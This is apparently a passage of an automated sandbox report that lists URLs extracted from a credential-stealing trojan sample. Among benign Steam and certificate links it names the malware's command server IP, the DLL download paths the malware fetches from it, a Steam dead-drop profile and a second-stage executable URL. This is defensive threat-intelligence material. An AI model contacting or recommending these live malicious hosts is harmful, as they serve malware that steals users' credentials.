Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://schemas.fontawesome.io/icons/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2047018875.000000001C3AD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://65.109.242.73
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/msvcp140.dllKD
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000514000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/sqln.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/vcruntime140.dllfH
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73/x5
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.730d7bece6afnt-Disposition:
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73BGDAKK--
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73BGDAKKg
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73DAKK
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73DBGC
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73T
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.73t/form-data;
Source: BKEBFHIJ.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BKEBFHIJ.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://centrosmissextensions.com/
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000162B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://centrosmissextensions.com/Soft123.exe
Source: BKEBFHIJ.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BKEBFHIJ.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6q6r
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=wC7D7_Fi9JOs&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BKEBFHIJ.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BKEBFHIJ.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BKEBFHIJ.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/autofac/Autofac
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://github.com/tmds/Tmds.DBus
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://github.com/tmds/Tmds.DBus/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://github.com/tmds/Tmds.DBus/issues/15.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://help.steampowered.com/en/
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://mozilla.org0/
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888g
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/
Source: 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKKFIIEB.3.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JKKFIIEB.3.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JKKFIIEB.3.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JKKFIIEB.3.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
